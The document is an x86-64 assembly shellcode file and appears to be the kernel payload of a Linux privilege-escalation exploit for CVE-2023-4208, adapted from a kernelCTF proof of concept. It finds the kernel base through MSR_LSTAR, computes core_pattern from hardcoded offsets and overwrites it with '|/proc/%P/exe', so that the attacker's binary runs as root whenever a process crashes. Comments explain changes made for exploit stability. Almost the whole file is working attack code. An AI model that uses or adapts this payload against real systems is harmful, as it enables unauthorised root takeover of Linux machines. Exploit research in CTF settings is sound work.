# This payload is based on
# https://raw.githubusercontent.com/google/security-research/refs/heads/master/pocs/linux/kernelctf/CVE-2023-4208_lts_cos_mitigation/exploit/lts-6.1.36/sc.py

.intel_syntax noprefix

.set entry_SYSCALL_64, 0xffffffff82400040
.set core_pattern, 0xffffffff83bbace0

# do rdmsr(MSR_LSTAR) so EDX and EAX will contain address of entry_SYSCALL_64
# ECX should be MSR_LSTAR ( 0xc0000082 )
xor ecx, ecx
xor edx, edx
mov cl, 0xc0
shl ecx, 24
mov cl, 0x82
rdmsr
# make rdx = entry_SYSCALL_64's address
xor ecx, ecx
mov cl, 32
shl rdx, cl
add rdx, rax
xor esi,esi
mov sil, (((core_pattern - entry_SYSCALL_64) >> 24) & 0xFF)
shl esi, 8
mov sil, (((core_pattern - entry_SYSCALL_64) >> 16) & 0xFF)
shl esi, 8
mov sil, (((core_pattern - entry_SYSCALL_64) >>  8) & 0xFF)
shl esi, 8
mov sil, (((core_pattern - entry_SYSCALL_64) >>  0) & 0xFF)
add rdx, rsi
# rdx = core_pattern

# prepare offset
xor eax, eax
mov al, 4

# write |/proc/%P/exe\0 into core_pattern
xor esi, esi
mov sil, 'r'
shl esi, 8
mov sil, 'p'
shl esi, 8
mov sil, '/'
shl esi, 8
mov sil, '|'
mov [rdx], esi
add rdx, rax

xor esi, esi
mov sil, '%'
shl esi, 8
mov sil, '/'
shl esi, 8
mov sil, 'c'
shl esi, 8
mov sil, 'o'
mov [rdx], esi
add rdx, rax

xor esi, esi
mov sil, 'x'
shl esi, 8
mov sil, 'e'
shl esi, 8
mov sil, '/'
shl esi, 8
mov sil, 'P'
mov [rdx], esi
add rdx, rax

xor esi, esi
mov sil, 'e'
mov [rdx], esi

# The original version used on remote would run an infinite loop here
# jmp .
# This is however a little bit annoying sometimes because it would prevent
# this core from scheduling causing deadlocks.
# Thus to improve stability we will just return NULL here, which works in our
# case.
# Note that since our "nop-sled" pushed an invalid return address to the stack,
# thus we have to repair that first..
pop rax
xor eax, eax
ret
